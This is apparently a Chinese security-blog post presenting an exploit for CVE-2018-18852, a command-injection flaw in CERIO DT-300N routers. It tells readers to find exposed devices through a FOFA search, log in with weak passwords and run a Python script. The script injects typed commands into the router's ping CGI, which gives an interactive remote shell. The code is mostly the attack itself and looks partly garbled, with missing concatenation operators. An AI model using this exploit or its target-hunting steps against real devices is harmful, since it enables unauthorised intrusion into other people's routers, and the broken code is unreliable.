1. 极安网首页
  2. 网络安全技术

CVE-2018-18852漏洞利用

CVE-2018-18852 CERIO DT-300N是中国台湾智鼎资讯(CERIO)公司的一款无线路由器。CERIO DT-300N 1.1.6版本至1.1.12版本中存在操作命令注入漏洞。攻击者可利用该漏洞执行ping命令。

查找具备漏洞版本的目标,这里利用FOFA搜索的 title="CERIO" 关键信息,然后找个弱口令登入进去。

漏洞利用代码:

  1. import requests
  2. import json
  3. import base64
  4. class Demo:
  5.     def __init__(self,headers,url,payload,url2):
  6.         self.headers=headers
  7.         self.url=url
  8.         self.payload=payload
  9.         self.url2=url2
  10.     def requet(self):
  11.         ver = 'DT-300N-NGS-M'
  12.         ver2='DT-300N'
  13.         version=''
  14.         vurl=''
  15.         rqt=requests.post(url=self.url,headers=self.headers,data=self.payload)
  16.         nurl=''
  17.         nersion=''
  18.         if rqt.status_code==requests.codes.ok:
  19.             print('[ ] Router version number is {}'.format(ver))
  20.             while True:
  21.                 rqt = requests.post(url=self.url, headers=self.headers, data=self.payload)
  22.                 nurl =rqt.url
  23.                 nersion =ver
  24.                 nary=json.loads(rqt.content)
  25.                 cmd = input('command:')
  26.                 payload = {'ip': '127.0.0.1;' 'echo "[[[";' cmd, 'pid': nary['pid'], 'Times': 1}
  27.                 self.command(self.url, headers, payload,nersion)
  28.         elif rqt.status_code==requests.codes.not_found: #判断状态码是否为404
  29.             print('[-] Router version number is not {}'.format(ver))
  30.             rqts=requests.post(url=self.url2,headers=headers,data=self.payload)
  31.             if rqts.status_code==requests.codes.ok:
  32.                 print('[ ] Router version number is {}'.format(ver2))
  33.                 while True:
  34.                     rqts = requests.post(url=self.url2, headers=headers, data=self.payload)
  35.                     version =ver2
  36.                     vurl =rqts.url
  37.                     vary=json.loads(rqts.content)
  38.                     cmd=input('command:')
  39.                     payload = {'ip': '127.0.0.1;' 'echo "[[[";' cmd, 'pid': vary, 'Times': 1}
  40.                     self.command(self.url2,headers,payload,version)
  41.             elif rqts.status_code==requests.codes.not_found:
  42.                 print('[-] Router version number is not {}'.format(ver2))
  43.                 exit()
  44.             elif rqts.status_code==requests.codes.unauthorized:
  45.                 print('[-] Auth is invalid, try other creds')
  46.                 exit()
  47.     def command(self,url,header,data,ver):
  48.         rsv=requests.post(url=url,headers=header,data=data)
  49.         if ver=='DT-300N':
  50.             print(rsv.text.split('/html')[1])
  51.         else:
  52.             print(rsv.text.split('[[[')[1])
  53. if __name__ == '__main__':
  54.     print('[&]')
  55.     print('[!] CERIO DT-300N-NGS-M\n[!] CERIO DT-300N')
  56.     print('')
  57.     t=''
  58.     path='/cgi-bin/main.cgi?cgi=PING&mode=9'
  59.     path2='/cgi-bin/Save.cgi?cgi=PING'
  60.     user=input('host:').strip()
  61.     ports=input('port:').strip()
  62.     username=input('creds:').strip()
  63.     creds=bytes(base64.b64encode(bytes(username,encoding='utf-8'))).decode('utf-8')
  64.     if ports in '443':
  65.         t ='https://'
  66.     else:
  67.         t ='http://'
  68.     urls=t user ':' ports path
  69.     urls2=t user ':' ports path2
  70.     payload={'cgi':'PING','mode':9}
  71.     headers={'content-type': 'application/json', 'Host': user, 'Accept-Encoding': 'gzip, deflate','Content-Length': '0', 'Connection': 'keep-alive', 'Authorization': 'Basic {}'.format(creds)}
  72.     obj=Demo(headers=headers,payload=payload,url=urls,url2=urls2)
  73.     obj.requet()

CVE-2018-18852漏洞利用-极安网

原创文章,作者: Admin ,转载请注明出处:https://secvery.com/2886.html